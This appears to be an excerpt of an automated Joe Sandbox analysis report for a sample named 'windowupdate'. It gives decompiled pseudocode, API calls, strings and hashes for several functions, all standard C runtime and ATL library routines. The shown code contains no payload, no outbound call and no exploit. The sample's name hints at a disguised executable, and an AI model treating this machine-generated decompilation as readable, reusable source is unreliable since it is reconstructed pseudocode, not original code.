                      					_t78 = E00D4C670(__ebx, __ecx, __edi, _t124);
                      					_t124 = _t78;
                      					_t79 = E00D4E220(0);
                      					_t125 = _t125 + 4;
                      					if( *((intOrPtr*)(_t78 + 8)) != _t79 &&  *_a4 != 0xe0434f4d &&  *_a4 != 0xe0434352) {
                      						_t83 = E00D49820(_a4, _a8, _a12, _a16, _a20, _a28, _a32);
                      						_t125 = _t125 + 0x1c;
                      						if(_t83 != 0) {
                      							return _t83;
                      						}
                      					}
                      				}
                      				E00D4D6F0( &_v24, _a20, 0);
                      				if(E00D4E140( &_v24) <= 0) {
                      					L00D90DE0(_t84,  &_v24, _t123, _t124);
                      				}
                      				_t61 = E00D4E140( &_v24);
                      				if(_t61 > 0) {
                      					E00D496D0(_t84, _t123, _t124,  &_v48,  &_v24, _a24, _a16, _a20, _a28);
                      					_t126 = _t125 + 0x18;
                      					_v16 = _v48;
                      					_v12 = _v44;
                      					while(1) {
                      						_t61 = E00D4D950( &_v16,  &_v40);
                      						if((_t61 & 0x000000ff) == 0) {
                      							goto L23;
                      						}
                      						E00D4D8C0( &_v16,  &_v68);
                      						if(_v68 > _a24 || _a24 > _v64) {
                      							goto L13;
                      						} else {
                      							_push(0);
                      							_push(0);
                      							E00D4D6C0( &_v32,  &_v68);
                      							_v8 = E00D4E110( &_v32);
                      							if(_v8[1] == 0 ||  *((char*)(_v8[1] + 8)) == 0) {
                      								if(( *_v8 & 0x00000040) == 0) {
                      									_push(0);
                      									_push(1);
                      									E00D4CC90(_a4, _a8, _a12, _a16, _a20, _v8, 0,  &_v68, _a28, _a32);
                      									_t126 = _t126 + 0x30;
                      									goto L13;
                      								} else {
                      									goto L21;
                      								}
                      							} else {
                      								L21:
                      								L13:
                      								E00D4D930( &_v16);
                      								continue;
                      							}
                      						}
                      						goto L23;
                      					}
                      				}
                      				L23:
                      				return _t61;
                      			}





















                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4D297
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4D2A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: MOC$RCC
                      • API String ID: 984050374-2084237596
                      • Opcode ID: c73bb0183ecdf91fe604f38042492638d038765aa04ba797440bf0163dd74fdd
                      • Instruction ID: 922d6fd3411def0ec9c16ec9902725b2ad8922b27f1e1a4169a3b8cdbed0d55e
                      • Opcode Fuzzy Hash: c73bb0183ecdf91fe604f38042492638d038765aa04ba797440bf0163dd74fdd
                      • Instruction Fuzzy Hash: 80510C71A00109EBCB04DF98D895EEE77BABF48300F188159F91AA7291DB34ED41CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E00D5B750(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				void* _t39;
                      				void* _t43;
                      				void* _t50;
                      				void* _t52;
                      				void* _t60;
                      				void* _t61;
                      
                      				_t52 = __ecx;
                      				if(_a16 == 0) {
                      					return 0;
                      				}
                      				__eflags = _a4;
                      				if(_a4 == 0) {
                      					_v8 = 0;
                      				} else {
                      					_v8 = 1;
                      				}
                      				_v12 = _v8;
                      				__eflags = _v12;
                      				if(__eflags == 0) {
                      					_t50 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x1c, 0, L"%ls", L"destination != nullptr");
                      					_t60 = _t60 + 0x18;
                      					__eflags = _t50 - 1;
                      					if(_t50 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				__eflags = _v12;
                      				if(_v12 != 0) {
                      					__eflags = _a12;
                      					if(_a12 == 0) {
                      						L12:
                      						_t53 = _a4;
                      						E00D5B920(_a4, _a4, 0, _a8);
                      						_t61 = _t60 + 0xc;
                      						__eflags = _a12;
                      						if(_a12 == 0) {
                      							_v16 = 0;
                      						} else {
                      							_v16 = 1;
                      						}
                      						_v20 = _v16;
                      						__eflags = _v20;
                      						if(__eflags == 0) {
                      							_t43 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x23, 0, L"%ls", L"source != nullptr");
                      							_t61 = _t61 + 0x18;
                      							__eflags = _t43 - 1;
                      							if(_t43 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v20;
                      						if(_v20 != 0) {
                      							_t54 = _a8;
                      							__eflags = _a8 - _a16;
                      							if(_a8 < _a16) {
                      								_v24 = 0;
                      							} else {
                      								_v24 = 1;
                      							}
                      							_v28 = _v24;
                      							__eflags = _v28;
                      							if(__eflags == 0) {
                      								_t39 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x24, 0, L"%ls", L"size_in_elements >= count");
                      								_t61 = _t61 + 0x18;
                      								__eflags = _t39 - 1;
                      								if(_t39 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							__eflags = _v28;
                      							if(_v28 != 0) {
                      								return 0x16;
                      							} else {
                      								 *((intOrPtr*)(L00D82F70(_t54))) = 0x22;
                      								E00D82900(L"size_in_elements >= count", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x24, 0);
                      								return 0x22;
                      							}
                      						} else {
                      							 *((intOrPtr*)(L00D82F70(_t53))) = 0x16;
                      							E00D82900(L"source != nullptr", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x23, 0);
                      							return 0x16;
                      						}
                      					}
                      					__eflags = _a8 - _a16;
                      					if(_a8 >= _a16) {
                      						E00D5B730(_a4, _a12, _a16);
                      						__eflags = 0;
                      						return 0;
                      					}
                      					goto L12;
                      				} else {
                      					 *((intOrPtr*)(L00D82F70(_t52))) = 0x16;
                      					E00D82900(L"destination != nullptr", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x1c, 0);
                      					return 0x16;
                      				}
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$destination != nullptr$minkernel\crts\ucrt\src\appcrt\string\wmemcpy_s.cpp$size_in_elements >= count$source != nullptr$wmemcpy_s
                      • API String ID: 0-1746489773
                      • Opcode ID: e48faa4d39c90160a751b4a25a0ea8e199537eaa609f310c8feb522972aa10e7
                      • Instruction ID: 8e72d6a7f75cfb3dc677c681697a06c689165e14268aff28f059f35714beb7c9
                      • Opcode Fuzzy Hash: e48faa4d39c90160a751b4a25a0ea8e199537eaa609f310c8feb522972aa10e7
                      • Instruction Fuzzy Hash: 4D419670E80309AFDF20AE94CC5AFAE76A09B54716F145059FD01371C2D3B59A888BB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00D58D00(void* __ebx, void* __edi, void* __esi, signed char _a4) {
                      				signed int _v8;
                      				char _v24;
                      				signed char _v25;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				char _v56;
                      				intOrPtr _v60;
                      				char _v64;
                      				intOrPtr _v68;
                      				char _v72;
                      				signed char _v76;
                      				char _v80;
                      				char _v88;
                      				char _v96;
                      				char _v104;
                      				signed int _t45;
                      				char* _t47;
                      				intOrPtr _t50;
                      				char* _t76;
                      				intOrPtr _t93;
                      				intOrPtr _t95;
                      				signed int _t98;
                      
                      				_t97 = __esi;
                      				_t96 = __edi;
                      				_t74 = __ebx;
                      				_t45 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t45 ^ _t98;
                      				_t47 =  *0xf20640; // 0x0
                      				if( *_t47 != 0x58) {
                      					_t76 =  *0xf20640; // 0x0
                      					_t92 =  *_t76;
                      					if(_t92 != 0x3f) {
                      						E00D56AB0(__ebx, __edi, __esi, _a4, E00D4F3F0( &_v104));
                      						_t50 = _a4;
                      					} else {
                      						E00D57C80(__ebx, __edi, __esi,  &_v56);
                      						if(E00D5A510() == 0 ||  *0xf20650 == 0) {
                      							_v80 = E00D50060("`template-parameter", 0x13);
                      							_v76 = _t92;
                      							_t92 =  &_v96;
                      							_v48 = E00D4FAA0( &_v96,  &_v80,  &_v56);
                      							E00D4FBB0(_v48, _a4, 0x27);
                      							_t50 = _a4;
                      						} else {
                      							E00D57D80( &_v56,  &_v24, 0x10);
                      							_t93 =  *0xf20650; // 0x0
                      							_v40 = _t93;
                      							_v32 = _v40;
                      							 *0xdc62b0(E00D92B00( &_v24));
                      							_v36 = _v32();
                      							if(_v36 == 0) {
                      								_v72 = E00D50060("`template-parameter", 0x13);
                      								_v68 = _t93;
                      								_v44 = E00D4FAA0( &_v88,  &_v72,  &_v56);
                      								_t92 = _a4;
                      								E00D4FBB0(_v44, _a4, 0x27);
                      								_t50 = _a4;
                      							} else {
                      								_t92 = 0;
                      								_v25 = 0;
                      								_push(_v25 & 0x000000ff);
                      								E00D4E750(_a4, _v36);
                      								_t50 = _a4;
                      							}
                      						}
                      					}
                      				} else {
                      					_t95 =  *0xf20640; // 0x0
                      					_t92 = _t95 + 1;
                      					 *0xf20640 = _t92;
                      					_v64 = E00D50060("void", 4);
                      					_v60 = _t92;
                      					E00D4F1F0(_a4,  &_v64);
                      					_t50 = _a4;
                      				}
                      				return E00D47280(_t50, _t74, _v8 ^ _t98, _t92, _t96, _t97);
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name::getString
                      • String ID: `template-parameter$void
                      • API String ID: 1028460119-4057429177
                      • Opcode ID: d25dcaada55358150cc57389d7cda0dde32404432d70fdc4cb53cf3275b5dea0
                      • Instruction ID: 6588cc5b868a44eab6bb1996570b9063a38770980fabd382e763e4886696158d
                      • Opcode Fuzzy Hash: d25dcaada55358150cc57389d7cda0dde32404432d70fdc4cb53cf3275b5dea0
                      • Instruction Fuzzy Hash: FC411271D00108EFDF14DF94D852AEE7BB5EF48305F148129F916A7251EB31AA09DB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E00D34A80(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4) {
                      				signed int _v8;
                      				intOrPtr* _v12;
                      				void* _v28;
                      				void* _v36;
                      				struct _FILETIME _v48;
                      				int _v60;
                      				char _v324;
                      				char _v336;
                      				void* _v340;
                      				void* _v344;
                      				void* _v348;
                      				signed int _t45;
                      				long _t52;
                      				void* _t57;
                      				void* _t59;
                      				void* _t67;
                      				intOrPtr* _t74;
                      				void* _t96;
                      				void* _t98;
                      				void* _t100;
                      				void* _t101;
                      				signed int _t103;
                      				void* _t104;
                      				void* _t105;
                      
                      				_t102 = __esi;
                      				_t70 = __ebx;
                      				_push(__ecx);
                      				_t100 =  &_v348;
                      				memset(_t100, 0xcccccccc, 0x56 << 2);
                      				_t105 = _t104 + 0xc;
                      				_t101 = _t100 + 0x56;
                      				_pop(_t74);
                      				_t45 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t45 ^ _t103;
                      				_v12 = _t74;
                      				E00D341C0( &_v28, 0);
                      				_v36 = E00D345F0( &_v28, __esi,  *_v12, _a4,  *(_v12 + 4) | 0x0002001f);
                      				if(_v36 == 0) {
                      					_v60 = 0x100;
                      					while(1) {
                      						_t102 = _t105;
                      						_t96 = _v28;
                      						_t52 = RegEnumKeyExA(_t96, 0,  &_v324,  &_v60, 0, 0, 0,  &_v48);
                      						__eflags = _t105 - _t105;
                      						__eflags = E00DC1520(_t52, _t105 - _t105);
                      						if(__eflags != 0) {
                      							break;
                      						}
                      						_v36 = E00D34A80(_t70,  &_v28, _t101, _t102, __eflags,  &_v324);
                      						__eflags = _v36;
                      						if(__eflags == 0) {
                      							_v60 = 0x100;
                      							continue;
                      						}
                      						_v344 = _v36;
                      						E00D34220( &_v28, __eflags);
                      						_t57 = _v344;
                      						L11:
                      						E00DC14C0(_t103, 0xd34c08);
                      						_t59 = _t57;
                      						_t98 = _t96;
                      						return E00DC1520(E00D47280(_t59, _t70, _v8 ^ _t103, _t98, _t101, _t102), _t103 - _t105 + 0x158);
                      					}
                      					E00D34420( &_v28, _t102);
                      					_t96 = _a4;
                      					_v348 = E00D34310(_v12, _t102, _t96);
                      					E00D34220( &_v28, __eflags);
                      					_t57 = _v348;
                      					goto L11;
                      				}
                      				if(_v36 != 2) {
                      					_t110 = _v36 - 3;
                      					if(_v36 != 3) {
                      						_t96 = _v36;
                      						_push(_t96);
                      						_t67 = E00D3F200(0xf237b8);
                      						E00D323E0(__ebx, _t101, __esi, _t110, E00D323B0( &_v336, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x18c9), _t67, 0, "CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d)\n", _a4);
                      						_t105 = _t105 + 0x18;
                      					}
                      				}
                      				_v340 = _v36;
                      				E00D34220( &_v28, _t110);
                      				_t57 = _v340;
                      				goto L11;
                      			}

                      APIs
                        • Part of subcall function 00D345F0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D346FE
                      • _Smanip.LIBCPMTD ref: 00D34B14
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                      • ~Module.VCCORLIBD ref: 00D34B2E
                      • RegEnumKeyExA.ADVAPI32 ref: 00D34B62
                      • ~Module.VCCORLIBD ref: 00D34B97
                      • ~Module.VCCORLIBD ref: 00D34BCA
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D34BDF
                      Strings
                      • CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d), xrefs: 00D34AF2
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D34B09
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckModuleStackVars@8$EnumSmanip
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d)
                      • API String ID: 2188485312-3584847366
                      • Opcode ID: 686315aa1c85192f9548b5241f84cbb886c55a7940064ade682be1a46a922141
                      • Instruction ID: 42e401393dae2397fc25e119b93f861fa0b861a5efabab03a5659c93faa34393
                      • Opcode Fuzzy Hash: 686315aa1c85192f9548b5241f84cbb886c55a7940064ade682be1a46a922141
                      • Instruction Fuzzy Hash: 8B410175900218EBDB54EF94DC96FEEB774EF88301F004159E505BB291DB78A984CBB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00D449E0(short* __edx, void* __edi, void* __esi, char* _a4, int _a8) {
                      				int _v8;
                      				int _v12;
                      				int _v16;
                      				int _v20;
                      				char _v28;
                      				void _v36;
                      				int _v40;
                      				int _v44;
                      				short* _v48;
                      				int _v52;
                      				void _v56;
                      				int _t43;
                      				void* _t45;
                      				int _t50;
                      				int _t58;
                      				int _t73;
                      				short* _t74;
                      				void* _t87;
                      				void* _t88;
                      				void* _t89;
                      
                      				_t74 = __edx;
                      				memset( &_v56, 0xcccccccc, 0xd << 2);
                      				_t89 = _t88 + 0xc;
                      				if(_a4 == 0 || _a8 == 0) {
                      					_t43 = 0;
                      					goto L12;
                      				} else {
                      					_v8 = 0;
                      					_v12 = E00D31AB0();
                      					_v16 = 0;
                      					_v20 = 0;
                      					E00D3F2E0( &_v28);
                      					_v36 = 0;
                      					_t50 = MultiByteToWideChar(_v12, 0, _a4, _a8, 0, 0);
                      					__eflags = _t89 - _t89;
                      					_v40 = E00DC1520(_t50, _t89 - _t89);
                      					_t52 = _v40;
                      					_v44 = _v40;
                      					__eflags = _a8 - 0xffffffff;
                      					if(_a8 == 0xffffffff) {
                      						_t73 = _v44 - 1;
                      						__eflags = _t73;
                      						_v44 = _t73;
                      					}
                      					_t74 = _v44;
                      					__imp__#4(0, _t74);
                      					__eflags = _t89 - _t89;
                      					_v36 = E00DC1520(_t52, _t89 - _t89);
                      					__eflags = _v36;
                      					if(_v36 == 0) {
                      						L11:
                      						_v56 = _v36;
                      						E00D3F220( &_v28);
                      						_t43 = _v56;
                      						goto L12;
                      					} else {
                      						_t58 = MultiByteToWideChar(_v12, 0, _a4, _a8, _v36, _v40);
                      						__eflags = _t89 - _t89;
                      						_v48 = E00DC1520(_t58, _t89 - _t89);
                      						_t74 = _v48;
                      						__eflags = _t74 - _v40;
                      						if(__eflags != 0) {
                      							_t59 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x482, 0, "%ls", L"nResult == nConvertedLen");
                      							_t89 = _t89 + 0x18;
                      							__eflags = _t59 - 1;
                      							if(_t59 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v48 - _v40;
                      						if(_v48 == _v40) {
                      							goto L11;
                      						} else {
                      							_t74 = _v36;
                      							__imp__#6(_t74);
                      							__eflags = _t89 - _t89;
                      							E00DC1520(_t59, _t89 - _t89);
                      							_v52 = 0;
                      							E00D3F220( &_v28);
                      							_t43 = _v52;
                      							L12:
                      							_push(_t74);
                      							E00DC14C0(_t87, 0xd44b48);
                      							_t45 = _t43;
                      							return E00DC1520(_t45, _t87 - _t89 + 0x34);
                      						}
                      					}
                      				}
                      			}
























                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D44A4A
                      • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00D44A77
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?), ref: 00D44AA9
                      • SysFreeString.OLEAUT32(00000000), ref: 00D44AF5
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D44B31
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h, xrefs: 00D44AD2
                      • nResult == nConvertedLen, xrefs: 00D44AC1
                      • %ls, xrefs: 00D44AC6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ByteCharMultiStringWide$AllocCheckFreeStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$nResult == nConvertedLen
                      • API String ID: 2571081082-1767654226
                      • Opcode ID: e5d58c7a4c8913a0d3f44192edd9617f0a188a0efa38d304fdf6eacd6dd63165
                      • Instruction ID: fba644ad3ffbc305f55fd3039595c9159c0de2e2dfb21a7a26277695c0d474f7
                      • Opcode Fuzzy Hash: e5d58c7a4c8913a0d3f44192edd9617f0a188a0efa38d304fdf6eacd6dd63165
                      • Instruction Fuzzy Hash: BA415976E00219AFCB10EF98D886FEEBBB5EB48350F148118E515BB281D7749D80CBB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00D80130(intOrPtr __ecx) {
                      				intOrPtr _v8;
                      				intOrPtr* _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _t55;
                      				void* _t59;
                      				intOrPtr _t66;
                      				intOrPtr _t74;
                      				void* _t82;
                      
                      				_v8 = __ecx;
                      				if((E00D7FDB0(_v8) & 0x000000ff) != 0) {
                      					_t66 = _v8;
                      					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
                      					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
                      						L4:
                      						return 1;
                      					}
                      					_t74 = _v8;
                      					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
                      					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
                      						_v28 = _v8 + 0x464;
                      						_t10 = _v8 + 0xaa4; // 0xff458800
                      						_t13 = ( *_t10 << 4) + 0x474; // 0xd6b1da
                      						_v32 = _v8 + _t13;
                      						_v12 = _v28;
                      						while(1) {
                      							__eflags = _v12 - _v32;
                      							if(_v12 == _v32) {
                      								break;
                      							}
                      							_t23 = _v8 + 0x14; // 0x8b18408b
                      							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
                      							_v16 =  *_v12;
                      							_v16 = _v16 - 1;
                      							__eflags = _v16 - 3;
                      							if(_v16 > 3) {
                      								__eflags = 0;
                      								if(0 == 0) {
                      									_v20 = 0;
                      								} else {
                      									_v20 = 1;
                      								}
                      								_v24 = _v20;
                      								__eflags = _v24;
                      								if(__eflags == 0) {
                      									_t59 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
                      									_t82 = _t82 + 0x18;
                      									__eflags = _t59 - 1;
                      									if(_t59 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								__eflags = _v24;
                      								if(_v24 != 0) {
                      									L22:
                      									_t55 = _v12 + 0x10;
                      									__eflags = _t55;
                      									_v12 = _t55;
                      									continue;
                      								} else {
                      									 *((intOrPtr*)(L00D82F70(0))) = 0x16;
                      									E00D82900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
                      									return 0;
                      								}
                      							}
                      							switch( *((intOrPtr*)(_v16 * 4 +  &M00D802B8))) {
                      								case 0:
                      									E00D64910(_v8 + 0x14);
                      									_t82 = _t82 + 4;
                      									goto L22;
                      								case 1:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00D64B30(_v8 + 0x14);
                      									goto L22;
                      								case 2:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00D64AF0(_v8 + 0x14);
                      									goto L22;
                      								case 3:
                      									_v8 = _v8 + 0x14;
                      									_v40 = E00D64B10(_v8 + 0x14);
                      									_v36 = __edx;
                      									goto L22;
                      							}
                      						}
                      						return 1;
                      					}
                      					goto L4;
                      				}
                      				return 0;
                      			}

                      Strings
                      • ("Missing position in the format string", 0), xrefs: 00D80251, 00D80299
                      • __crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_st, xrefs: 00D80294
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00D80262, 00D8028F
                      • %ls, xrefs: 00D80256
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_st$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-4110031974
                      • Opcode ID: 3d3f0efec0e3d279df4f3bec93d93e2c3c1db8ef92c2d2c4542ccbfb86a4855a
                      • Instruction ID: a4278949352f5420c1065983bb9bc09a8e3906408ea46a7cb2e904f746e841a4
                      • Opcode Fuzzy Hash: 3d3f0efec0e3d279df4f3bec93d93e2c3c1db8ef92c2d2c4542ccbfb86a4855a
